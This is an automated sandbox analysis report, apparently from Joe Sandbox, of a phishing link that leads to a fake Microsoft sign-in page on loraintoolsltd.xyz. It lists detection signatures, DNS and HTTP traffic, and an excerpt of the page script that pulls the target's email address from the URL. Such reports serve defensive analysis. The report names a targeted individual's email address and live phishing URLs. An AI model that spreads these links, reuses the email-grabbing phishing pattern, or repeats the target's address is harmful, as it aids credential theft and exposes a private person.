Edit tour

Windows Analysis Report
http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292

Overview

General Information

Sample URL:	http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292
Analysis ID:	1598120
Infos:

Detection

HTMLPhisher

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Yara detected HtmlPhish46

Yara detected HtmlPhish54

Performs DNS queries to domains with low reputation

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML page contains string obfuscation

HTML title does not match URL

Stores files to the Windows start menu directory

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1744,i,10374688926292237597,1627901240066327570,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://demfre.com/lact/nhuo/onaoPJocCsxs7r0YZwFMZ/c3VzYW4ua2FsY3JvZnRAc3RhdGUubmUuZ292" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
1.5.id.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
1.18.i.script.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
3.3.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.4.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
4.5.pages.csv	JoeSecurity_HtmlPhish_46	Yara detected HtmlPhish_46	Joe Security
4.5.pages.csv	JoeSecurity_HtmlPhish_54	Yara detected HtmlPhish_54	Joe Security
Click to see the 1 entries

Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=

Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'login.loraintoolsltd.xyz' does not match the legitimate domain for Microsoft., The domain 'loraintoolsltd.xyz' does not have any known association with Microsoft., The use of a generic domain name with no clear connection to Microsoft is suspicious., The presence of a login page on an unrelated domain is a common phishing tactic. DOM: 4.5.pages.csv

Yara detected HtmlPhish46

Source: Yara match

File source: 4.5.pages.csv, type: HTML

Yara detected HtmlPhish54

Source: Yara match	File source: 1.5.id.script.csv, type: HTML
Source: Yara match	File source: 1.18.i.script.csv, type: HTML
Source: Yara match	File source: 3.3.pages.csv, type: HTML
Source: Yara match	File source: 4.4.pages.csv, type: HTML
Source: Yara match	File source: 4.5.pages.csv, type: HTML

Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0#susan.kalcroft@state.ne.gov	HTTP Parser: Number of links: 0
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	HTTP Parser: Number of links: 0

HTTP Parser: Base64 decoded: b3d7dace-e9ed-457b-acee-d0f5fc2ea281e7dc685d-71c1-4cdf-a4d9-8774b22407f1

Source: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov

HTTP Parser: Found new string: script . // Callback for the Turnstile verification. function onloadTurnstileCallback() {. turnstile.render('#turnstileCaptcha', {. sitekey: '0x4AAAAAAA5pnBhoTgM91kpZ',. callback: function(response) {. // Enable the button after successful verification. const verifyButton = document.getElementById('verifyButton');. if (verifyButton) {. verifyButton.style.opacity = '1'; // Make button fully visible. verifyButton.style.pointerEvents = 'auto'; // Enable pointer events. }. }. });. }.. // Function to extract and display the fragment. function displayEmailFromFragment() {. var fragment = window.location.hash;. if (fragment) {. var email = fragment.substring(1).replace(/=*$/, '');. var emailDisplay = document.getElementById('grabbed-email');. ...

Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0#susan.kalcroft@state.ne.gov	HTTP Parser: Title: Redirecting does not match URL
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	HTTP Parser: Title: Sign in to your account does not match URL

HTTP Parser: <input type="password" .../> found

Source: https://login.loraintoolsltd.xyz/FgJIoRDm#susan.kalcroft@state.ne.gov	HTTP Parser: No favicon
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0#susan.kalcroft@state.ne.gov	HTTP Parser: No favicon

Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0#susan.kalcroft@state.ne.gov	HTTP Parser: No <meta name="author".. found
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	HTTP Parser: No <meta name="author".. found
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	HTTP Parser: No <meta name="author".. found

Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0#susan.kalcroft@state.ne.gov	HTTP Parser: No <meta name="copyright".. found
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	HTTP Parser: No <meta name="copyright".. found
Source: https://login.loraintoolsltd.xyz/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638732702233892554.YjNkN2RhY2UtZTllZC00NTdiLWFjZWUtZDBmNWZjMmVhMjgxZTdkYzY4NWQtNzFjMS00Y2RmLWE0ZDktODc3NGIyMjQwN2Yx&ui_locales=en-US&mkt=en-US&client-request-id=afbe7e5d-b817-4cfb-925a-fa049f49afdb&state=kniLQk2xa-DHvggiqLVufaTxHzCt68_MOtTY5fKlih45LJaEtQHGehVSVLqXYtSTLKl7iyajJ6lyQqo6GEN-Tk6jQnZKaGbT8bxQSdCJFv2jObO6HnLeK6DCIfhusbndleU5Y_7N4PjytOVZsv_-21jQic58sZlY45vQ7g57a5pqqB69FWA5-SslViaTZOPSwLq5VGXj1t9I08JzKeIVwUxzQzoNLRT_ck8yy8kZR9yzZNTR3jZl5f2iydPalDw4u9-YUJkovZMAqJfRkUNRUA&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=true#susan.kalcroft@state.ne.gov=	HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49741 version: TLS 1.0

Networking

Performs DNS queries to domains with low reputation

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: login.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: login.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: www.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: www.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: live.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: live.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: login.loraintoolsltd.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	DNS query: login.loraintoolsltd.xyz

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49741 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /FgJIoRDm HTTP/1.1Host: login.loraintoolsltd.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://demfre.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/5.15.4/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/725bd36e298b/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://login.loraintoolsltd.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=906b6aa41d244405&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/4vxoh/0x4AAAAAAA5pnBhoTgM91kpZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
